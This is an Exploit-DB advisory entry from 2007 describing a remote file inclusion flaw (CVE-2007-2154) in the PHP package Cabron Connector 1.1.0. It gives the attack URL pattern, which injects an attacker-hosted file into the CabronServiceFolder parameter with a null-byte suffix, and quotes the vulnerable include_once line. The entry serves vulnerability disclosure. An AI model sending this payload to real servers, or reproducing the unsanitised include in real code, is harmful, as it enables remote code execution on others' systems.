Cabron Connector 1.1.0-Full - Remote File Inclusion

Author: Dj7xpl
type: webapps
platform: php
port: 
date_added: 2007-04-16 
date_updated: 2016-09-30 
verified: 1 
codes: OSVDB-37574;CVE-2007-2154 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcabron-full-110.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                   Cabron Connector v1.1.0
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Author :   Dj7xpl / Dj7xpl[at]Yahoo[dot]com
* Type :     Remote File Inclusion Vuln
* Download:  http://cabron.sourceforge.net
* Vuln:      http://[Target]/[Path]/services/samples/inclusionService.php?CabronServiceFolder=[EvilTxt]%00

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln Code:
             include_once("$CabronServiceFolder/lib/includedFunction.php");   <== Line(1)

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-17]